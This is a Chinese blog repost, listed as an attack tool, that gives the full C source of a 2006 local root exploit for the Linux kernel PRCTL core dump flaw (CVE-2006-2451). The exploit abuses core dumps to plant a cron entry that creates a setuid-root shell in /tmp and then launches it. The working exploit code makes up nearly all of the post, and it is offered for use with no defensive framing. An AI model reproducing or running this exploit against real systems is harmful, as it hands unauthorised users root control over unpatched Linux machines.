Linux Kernel2.6x 最新本地溢出代码(转)[@more@]工具分类:攻击程序
运行平台:Linux
工具大小:1684
Bytes文件MD5 :f011910d6400652177c3b2e66bfb7144
工具来源:http://www.rs-labs.com/
Linux Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)
PRCTL Core Dump Handling - Local r00tBy: dreyer & RoMaNSoFt[ 10.Jul.2006 ]
运行平台:Linux
工具大小:1684
Bytes文件MD5 :f011910d6400652177c3b2e66bfb7144
工具来源:http://www.rs-labs.com/
Linux Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)
PRCTL Core Dump Handling - Local r00tBy: dreyer & RoMaNSoFt[ 10.Jul.2006 ]
CODE:
/*****************************************************/
/* Local r00t Exploit for: */ /* Linux Kernel PRCTL Core Dump Handling */ /* ( BID 18874 / CVE-2006-2451 ) */ /* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */ /* By: */ /* - dreyer (main PoC code) */ /* - RoMaNSoFt (local root code) */ /* [ 10.Jul.2006 ] */ /*****************************************************/ #include #include #include #include #include #include #include #include char *payload=" SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin * * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core "; int main() { int child; struct rlimit corelimit; printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t "); printf("By: dreyer & RoMaNSoFt "); printf("[ 10.Jul.2006 ] "); corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); printf("[*] Creating Cron entry "); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); printf("[*] Sleeping for aprox. one minute (** please wait **) "); sleep(62); printf("[*] Running shell (remember to remove /tmp/sh when finished) ... "); system("/tmp/sh -p"); } 来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10617542/viewspace-960173/,如需转载,请注明出处,否则将追究法律责任。
上一篇:
Redhat9上配置DNS(转)
请登录后发表评论
登录
全部评论
<%=items[i].createtime%>
<%=items[i].content%> <%if(items[i].items.items.length) { %>
<%for(var j=0;j
<%}%> <%}%>
<%=items[i].items.items[j].createtime%>
<%=items[i].items.items[j].username%> 回复 <%=items[i].items.items[j].tousername%>: <%=items[i].items.items[j].content%>
还有<%=items[i].items.total-5%>条评论
) data-count=1 data-flag=true>点击查看
<%}%>
|
转载于:http://blog.itpub.net/10617542/viewspace-960173/